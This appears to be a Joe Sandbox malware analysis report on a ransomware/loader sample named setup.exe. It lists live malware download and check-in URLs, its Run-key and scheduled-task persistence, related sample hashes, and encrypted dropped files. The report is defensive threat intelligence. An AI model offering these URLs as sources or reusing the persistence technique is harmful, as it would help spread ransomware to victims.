              • Avira URL Cloud: malware
              unknown
              http://zexeq.com/test2/get.phpersetup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://uaery.top/dl/build2.exeesetup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonlsetup.exe, 00000011.00000002.2337567990.00000000008DA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.amazon.com/setup.exe, 00000007.00000003.2375375842.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://we.tl/t-zUVSNg4Ksetup.exe, 00000007.00000002.2791061138.00000000030FC000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://zexeq.com/files/1/build3.exe$runsetup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://www.twitter.com/setup.exe, 00000007.00000003.2376005794.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://we.tl/t-zUVSNg4KRZsetup.exe, 00000007.00000003.2789064304.0000000000693000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2791061138.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://uaery.top/dl/build2.exe$runsetup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.openssl.org/support/faq.htmlsetup.exe, 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.2ip.ua/geo.jsonbsetup.exe, 0000000C.00000002.2256293497.00000000007D3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://substrate.office.com58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js.7.drfalse
              • URL Reputation: safe
              unknown
              http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Errorsetup.exe, 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 00000010.00000002.2324184436.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonysetup.exe, 0000000C.00000002.2256293497.000000000076A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.json:setup.exe, 0000000C.00000002.2256293497.00000000007D3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/~Ssetup.exe, 0000000C.00000002.2256293497.00000000007D3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://zexeq.com/files/1/build3.exe$runpayinstall010921_delay_800_sec.exe2setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=trueLsetup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://www.youtube.com/setup.exe, 00000007.00000003.2376124786.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.2ip.ua/geo.jsonpsetup.exe, 00000002.00000002.2117422430.000000000079E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://uaery.top/dl/build2.exeAsetup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.wikipedia.com/setup.exe, 00000007.00000003.2376065739.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/msetup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.live.com/setup.exe, 00000007.00000003.2375802457.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://zexeq.com/files/1/build3.exe9setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://zexeq.com/files/1/build3.exesetup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.reddit.com/setup.exe, 00000007.00000003.2375940576.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=trueasetup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://www.google.com/setup.exe, 00000007.00000003.2375739601.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              188.40.141.211
              zexeq.comGermany
              24940HETZNER-ASDEtrue
              188.114.96.3
              api.2ip.uaEuropean Union
              13335CLOUDFLARENETUSfalse
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1484407
              Start date and time:2024-07-30 01:03:49 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 9m 32s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:20
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:setup.exe
              Detection:MAL
              Classification:mal100.rans.spre.troj.spyw.evad.winEXE@19/1330@3/2
              EGA Information:
              • Successful, ratio: 80%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 76
              • Number of non-executed functions: 273
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target setup.exe, PID 3500 because there are no executed function
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadFile calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              • Report size getting too big, too many NtWriteFile calls found.
              • VT rate limit hit for: setup.exe
              TimeTypeDescription
              01:04:39Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe s>--Task
              01:04:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
              01:04:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
              19:05:02API Interceptor1x Sleep call for process: setup.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              188.40.141.211SecuriteInfo.com.Win32.Evo-gen.21074.1738.exeGet hashmaliciousSmokeLoaderBrowse
              • agressivemnaiq.xyz/
              A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
              • host-data-coin-11.com/
              be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exeGet hashmaliciousSmokeLoaderBrowse
              • host-data-coin-11.com/
              EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
              • host-data-coin-11.com/
              LisectAVT_2403002B_303.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
              • aucmoney.com/upload/
              LisectAVT_2403002C_47.exeGet hashmaliciousSmokeLoaderBrowse
              • trad-einmyus.com/index.php
              EF48AEBC0F1E77208BBCD5206C58678BB1181994507D1084E1D324DCA9D5D3B8.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
              • host-data-coin-11.com/
              E6D881EA9A11D23E31737469C38C5C74DE54ADC680A662D877C6CAB46E3A34AB.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
              • host-data-coin-11.com/
              D9B72DA68DB9EB3D54BFD70C71F9A07EF222B7D9662DE35E74BA080B473DF4E2.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
              • host-data-coin-11.com/
              C7F05A51EF9CD4372057583AF5DDEF7EA41D377ECBDB06AA604DE8B59F277BD5.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
              • host-data-coin-11.com/
              188.114.96.3COMANDA BELOR NR13 DIN 240715.xlsGet hashmaliciousRemcosBrowse
              • wx.ax/e5E
              waybill_shipping_documents_original_BL_CI&PL_29_07_2024_00000000_doc.xlsGet hashmaliciousRemcosBrowse
              • tny.wtf/jqfJ
              Scan document.xlsGet hashmaliciousUnknownBrowse
              • hq.ax/s2K
              PI-002312.xlsGet hashmaliciousRemcosBrowse
              • tny.wtf/Zfp4WP
              QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • filetransfer.io/data-package/C1NtV6yB/download
              QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • filetransfer.io/data-package/ChmlFxWM/download
              Purchase order.xlsGet hashmaliciousRemcosBrowse
              • tny.wtf/L9GtsJ
              SHIPPING ADVICE MBL+HBL.exeGet hashmaliciousFormBookBrowse
              • www.ffi07s.xyz/y7ar/
              T7J24OBDyt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
              • 664732cm.nyashka.top/ImageMultiprotectDbWindowsTest.php
              wkoYf92Fyp.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
              • 664732cm.nyashka.top/ImageMultiprotectDbWindowsTest.php
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              api.2ip.uae8997f96b91ab5ea1fed555a7d62369a8307b0cfcbd0e32c5e9a7e430ab42240.zipGet hashmaliciousDjvuBrowse
              • 188.114.97.3
              A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 188.114.96.3
              DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • 188.114.97.3
              E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • 188.114.96.3
              FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 188.114.96.3
              F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 188.114.96.3
              F2E3FA89C1A2C72EA78C4D32446221C08B30C7C3363F8248F04AA9EEE2E15C70.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 188.114.96.3
              e26edae12836af5e3c42984eca4da6de5d4853701ef28c178de2276575408bb8.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 188.114.96.3
              E1BE354A31A340C3EBE7BF14ED0FBBCB788A47190B253D05067E9E8698C25698.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 188.114.96.3
              D932DBE6A5BE50D4668037CD66420FC424DE0B57368ED6FC8A1D249F4D6D1E10.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • 188.114.96.3
              zexeq.comc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeGet hashmaliciousBabuk, DjvuBrowse
              • 199.59.242.150
              baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeGet hashmaliciousBabuk, DjvuBrowse
              • 199.59.242.150
              3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeGet hashmaliciousBabuk, DjvuBrowse
              • 175.119.10.231
              9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
              • 175.120.254.9
              UpS8Qm873s.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
              • 175.120.254.9
              g0Zq7nJjus.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
              • 196.188.169.138
              E0tabE4K4r.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
              • 109.175.29.39
              sbvN2ih5AU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
              • 175.120.254.9
              kOVwcHSfrR.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
              • 186.182.55.44
              file.exeGet hashmaliciousBabuk, DjvuBrowse
              • 180.94.156.61
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              HETZNER-ASDEhttps://orr.swq.mybluehost.me/ch/f6014/Get hashmaliciousUnknownBrowse
              • 5.9.235.246
              https://orr.swq.mybluehost.me/ch/Get hashmaliciousUnknownBrowse
              • 168.119.146.39
              Surat kuasa nomor p7 tanggal 29072024.xlsx.exeGet hashmaliciousAgentTeslaBrowse
              • 85.10.224.196
              h3H69FhCbT.exeGet hashmaliciousVidarBrowse
              • 168.119.176.241
              http://exhibitprosper.com/r5K0.aspx?4XVH7cbbbd9tkD1cc3JlHcwglSchg7pcmcpJJhf9scGet hashmaliciousPhisherBrowse
              • 116.202.235.239
              https://www.drvhub.netGet hashmaliciousUnknownBrowse
              • 116.202.167.133
              Universal Radio Programmer.pdfGet hashmaliciousUnknownBrowse
              • 116.202.236.172
              pL4BuHX1c4.dllGet hashmaliciousUnknownBrowse
              • 188.40.187.174
              UZo3Dk6dIq.lnkGet hashmaliciousUnknownBrowse
              • 188.40.187.174
              IuNHtgZjF3.dllGet hashmaliciousUnknownBrowse
              • 188.40.187.174
              CLOUDFLARENETUSMain.exeGet hashmaliciousLummaCBrowse
              • 188.114.97.3
              http://meuitamasklogin.gitbook.io/usGet hashmaliciousUnknownBrowse
              • 172.64.147.209
              https://urlz.fr/rnYDGet hashmaliciousUnknownBrowse
              • 104.21.234.214
              cheat_roblox.exeGet hashmaliciousXWormBrowse
              • 172.67.132.113
              https://urlz.fr/rlHVGet hashmaliciousUnknownBrowse
              • 104.21.234.214
              roblox cheat.exeGet hashmaliciousXWormBrowse
              • 104.21.4.208
              http://pub-99b5c3466f52474c877bb48aca98b2d8.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
              • 104.17.25.14
              http://metemiskalogio.gitbook.io/usGet hashmaliciousUnknownBrowse
              • 104.16.117.116
              solarabootstrapper.exeGet hashmaliciousXWormBrowse
              • 104.20.23.46
              https://chattts-49f1.beszyrecala.workers.dev/26d0111e-bce1-4044-b6b4-e1=Get hashmaliciousUnknownBrowse
              • 104.16.119.9
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e19Update.jsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              rSignedApprovedQuotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 188.114.96.3
              SecuriteInfo.com.Trojan.TR.Crypt.ZPACK.Gen.4132.15029.exeGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              SecuriteInfo.com.Trojan.TR.Crypt.ZPACK.Gen.4132.15029.exeGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              h3H69FhCbT.exeGet hashmaliciousVidarBrowse
              • 188.114.96.3
              msi.dll.dllGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              msi.dll.dllGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              msi.dll.dllGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              SecuriteInfo.com.Win32.Malware-gen.5664.766.exeGet hashmaliciousGuLoaderBrowse
              • 188.114.96.3
              msi.dll.dllGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              No context
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):629
              Entropy (8bit):7.6568640047095275
              Encrypted:false
              SSDEEP:12:kCT8g8qhzMFxTm0DTjjjtYW5IYWZd5zmsDgsrvyZ/mzsMR2cii9a:j4g8qRMFl1jpYW5IYWZLzmagGaZrbD
              MD5:74FAFDEC0D37EC2AD30CD3F8219D709F
              SHA1:962405D1CA7121E2A784512FA3CEA3FE6AA80628
              SHA-256:3245F12649670C2D6B645CAC2D45F48138E9FA382EF875EBE332BB20A6583BBC
              SHA-512:A9D18E9A2C577AAD083D7524CD438E4CA917CF2D5B4CC8958C8FB58AA60442319CC0D530BA97C6BF3CF334A0CC51DF3E815B0541C037D74B1220CF76A78FE57E
              Malicious:false
              Reputation:low
              Preview:2023/WI.y..N..........MG%......... S...RcEZ..l<..u..k;)......+&;}......:{.h........ls.D.`.-){q......>....9...$......_..&..C.~_..[........+i.G..>.."..M:..Co..j7@,...L....x.SB.....m#.73u..|....m2<.p......H.u._.:..[A.|.m......xP...G..:.2.....54..&..\`....,.P......r....P.D....v.d...O..0.*.7B=.5.A.@.||..W..s[F..+I.|.\C.[..v..v..J`...Jn..n<..s.gv@..,^...D..5.EV.g>....'N.....?....S...8.....`....W.pR....'Vk.......R...>A..y.....%..o.....I.t...)......+..l...Q...$!..=%...\M......._.C.I....v.?..B".J#.....q{.h..9....].q...."...(CB. .VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):673
              Entropy (8bit):7.608939834448641
              Encrypted:false
              SSDEEP:12:k2qN+2Iw2y15eVT1+pep1pfjAh7SPXLUsMR2cii9a:xPy150J+pejpf0tm79bD
              MD5:ED552D344700404BFD84BDE0ADA16435
              SHA1:F0C111C0F533E7B0650ADF3B41D070586E3C655C
              SHA-256:A3655403513CB36CE2C7A8BB7DA232853D43A8E5D9FF4018CC8612793228B837
              SHA-512:A6C5D4C89FE0B6AEC04397C50E5B51987FF17EA1A5B503617D68BE8A890DBE2BB393338A424EBD4727739906B9005E74F191C1BD2D02C2C3469B15D1BAF24BDC
              Malicious:false
              Reputation:low
              Preview:2023/H.A.5.VN.BK...6[#.[.G...C..^(R.q+.c..C.......o<....|..(.G....^.QUT....L.4'..^RDo... (.Qw........7...X..s...$*...}[.&2B..i.e..A.....DA.o....}....i....{;k...d..........^_X..o...EM.im..b...z......>.4u.a_rO./.4cF-...]T7bL5.....Q..'9..d.m"|R...4..8,q....:..o....Ur.%...z...I...V..n...&..~....]"......K_.%.....-..%.......%a..U.i......U&..g.....-......%.........$....^..&....D.=SUh.(..!i&..>..K$.:dA.W.u...0.....`.Y/_...PZ....W-pc......>...o..E=#F...:.Lq.R..".?..b.5.....N!....:Y..l.....}.%........S...{..?....4...v.....(....OI-....8S..Tx):.P.v.S..[}w.sL}`...c."#.g.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):818
              Entropy (8bit):7.74690309166724
              Encrypted:false
              SSDEEP:12:YKWkGWsoLhwA72jc3Qqm2mMXIwYtoxXrLa5AMrK7GHboasSIm89rWnsMR2cii9a:YKWkBgcgd2mpNtYYAMrK7G7XsSIm9cbD
              MD5:0A2C5E8677CC6936541273B9418CB2F4
              SHA1:1457A69784A7382DD989E94518E68F8C9C333144
              SHA-256:F5FBBC5402CC804CD72DF95430AB4CF7765AD3E41B80B9C9375109BB9B47B581
              SHA-512:C85B84587665259A6FE4CE0A8B27F99F8EFA2E091046B370546AF664AFA2763310E1009599DFBDBB97682F42BDF0BB35769A5E8636BEAF0F1E02009D039D2D50
              Malicious:false
              Reputation:low
              Preview:{"os_..7...I.sBj..4..u.....+P..q.".i.}dJ.....<f.}1.-......Y..V.:XX......L.A...N..:..FyQ./.-.f.3,s.8.`.48.............z...}.b..3E..^q/L....#.C.._.. ..T.D.@.F..T..I.....+.r..z+UM...f.j#...3........>...s...0Dl6K.#.'...C.....S'.t.H$.4.&.o.j.va<..L>...h..z......J.....}.M.v.tK.h.n..Wk&.#.e...u.._.o6....mL..'..{....".:...*mGY...w..Y.(. &.....p../...=5.P..w..A.........u.M..A.%.`..f.../.w..h...V..'.]&q.L...4.zs.5Y..o~....1......=..w?:...A..B&B.1....G...g..,....{.hs!..;X.#...=s<6..[..e6..m....,5@x.D?.H..9....+.:.X.p..~.M.....p.0..uv......_.....k....o........4>=.'.#...H.kq..^.O/T.$..O.#...mac.....].u..k.__<s(y..t.F.vA...P.....1..V.q../7M}....9S..Gs....^.D..U........'H....d.-.`im.......!.j...9f...."..>.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):5297
              Entropy (8bit):7.9630733276316175
              Encrypted:false
              SSDEEP:96:SZf/rT0MUHdcCA4VrE5ISvfv3cXAbYcXxgmHn8EFU:SZfTT0MrCilv3cotcEFU
              MD5:1D634CE6C2FFE62758D2B4EE5ADD5B0D
              SHA1:878349D25DE6018F67623F5FEC56ABDE14C76ECF
              SHA-256:FCF597D7CD83784D905F59401F65327465A3C966CA422D6422D734E320C6BB00
              SHA-512:ABBA0CECFF97EDE3C17D6538F8F570CE0567395371458F5F3E2DE501868C3039403B021A7BE02BCB1E2D6B2636AD2B27E4DB5CAFD5FBCE4859631D4E8F6C91F0
              Malicious:false
              Reputation:low
              Preview:*...#T...0V.......y.....2C.M..Q._N.Xo.a.M%...W...=.%.V..i.....o..........1.......j.A\.k....7....E...\../...Oz..Vo....Y*+...A..}....J..u5.....F..[.:...}.#.....f..q.k.y^p....\C.G...aV.l).. .;1..^..............x.a..;.t...[.[DM...X.......+)b..VEJh...n.Z.F!\..R...2...jb.sm.+^..f..K.L:p....u1...B.-., ....=+.\F....)n2.>....M..2.Ri.-.75..+IX.^..9V.C..#9h..-.9.4.......=3x..a.I..;.....,AZ......}XZ...w^....}...........D VGqIX.....V..{.....=4.tjM>.&..=....S.V$to,/...y~......5.....T[>.$...\X....T2.9...5@.(.......!G.3/X.h.......7...9.o.a..s.q...@.r.3....4.3....t..>..8.ji.?X.HtG...$q.x..._\L.+41.....0.*........f_...O#..Kf.C.{`>Q(...5.-f=.|9....P..up-...NG..Lo....18...A....0_CC."e..Bz...;Zp..z]..g>j9.{..[.8T^...i.Q...2.@..e5~.dB!.ro.......t..H|.]?\t.g..,....%.....<1.=..I.T....p..g..[9.).6.{!......jo..1.....M.BHE...........~d.d._...^4...*.4...%_.O...$...=.j.P..'.d@.s.$u.d........Yk...[KH..N,)..6..|.....:(.[>..m.T..s+....0.=.......T.....<.S.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):661
              Entropy (8bit):7.620771072981636
              Encrypted:false
              SSDEEP:12:kSVNVt4lzx9QeDlbOCaoZFWgTzmck4Kt30+kuXD+W7GqQ5jrP1psMR2cii9a:LTVQzLDlbOCaoukmcx4IuyWTQ5jr0bD
              MD5:FA44B133CC75E409FF6725CFC18808EA
              SHA1:CCDC4D09CCA67E964BDA6DC2A6B9714EAAA32FCC
              SHA-256:C93DC7A551AA9DF7615C061B22A1750B08919D8CFD17D7E015A22D9B3F260DA8
              SHA-512:9C937425A68AB4D66AEA324DD596E99053F65F4E8857597E40320EE59D2C2598E6C98E0D7257D67B2E39E86742343F60DE23CB73D84F7CFE11334C565F714FCD
              Malicious:false
              Reputation:low
              Preview:2023/W..i....S.dd....rbs^Z.8k.`.TXH...s.s]o.=...H]........$L..59..q....0..3=.......H$.....<.....~N.A../Ka......J..R.S.a...~.{.#:..../.g.sO".i.p..*......Bs..P...=."..B"o.Q.../..,w..+..d"."J.j.Pq.....b..u..$1`...e.[..:......./S..>(..;.%.I..{.i.b.\..J\.s....0.........~i2.....jE.zJt....!&....dH.&}....?...y7....4...]r.9......_g.CZ.............X`.1..*..,T;\*.uQM.....cT..p.._.n..6..n...U.z..5..G..9xA2....:.Q.b.x...V.XH..>>e|#d...v..x`j:..o.;,..1e*...v..oz...v@.S5.w...[...{....PK....}.P9...J.Zy .....*D ....e.m......\.......C......).~.w.....J.$]....0.[....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):388
              Entropy (8bit):7.375880481259943
              Encrypted:false
              SSDEEP:12:45RUUjWZc3MBITLH++6OM9QG5j/ZV3P1sMR2cii9a:xW6IXegM9p5DZV3qbD
              MD5:FF2A3B0944C71D53AFD6EF5D64005604
              SHA1:37C92802CD372D9A166B09D06886CFE14CA97410
              SHA-256:2940FA0A49C2DCE3D2356DDEFD53CA7B4E6298493DF828DE060BAE91979BCC21
              SHA-512:25BC278BAB32C89178E99F62AF4377430A8C8B6C67CCC8A9470F5DB2EA5C1E0431EF9768B8EED5B22EEC1EEF1A07954AAE13F014D03BEF806D55A73315BD613F
              Malicious:false
              Reputation:low
              Preview:..../.lzS...4....@.....uY6%..(.|7......v....p#..l.8.A.!Q.O......B..&.c...t.g}.....a.n.$S:....@t.o.l.....Oe....s..M.I.H.).Sj^q.B..o..}.a....2~Y...i.8'.....4..U........E6......?..tp.c.e.GDc..Z.S.gk.Q.Wp_..$....}.[.......W.9.M..y@BL+..h.....l..........j%.d.......ahBF.6.3.k...5..(....O.f.....8..;..rVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):460
              Entropy (8bit):7.4734170772937185
              Encrypted:false
              SSDEEP:12:GzSs7fusF59QKdGCAfCQnY65E1rzsMR2cii9a:GzSsbWKdxGnY658rYbD
              MD5:A901506AB255B3749EF6B66C5EEDB1D2
              SHA1:A80146D4CDEE4C3358EE76DE7D70E454D42177AA
              SHA-256:3A65C6C122FE8EE9D12B2B51EF29B2D555EF7F746227D25B368AAF2BC51BF079
              SHA-512:2D26A1C3C833275C9131E1541E3FC8F0DC43FF893943500F9E60033152E87964E8FF065D5B16DF31E2493DA3B7F4D2DA376DC4A4D57617EEF7A8B42C1C077F97
              Malicious:false
              Reputation:low
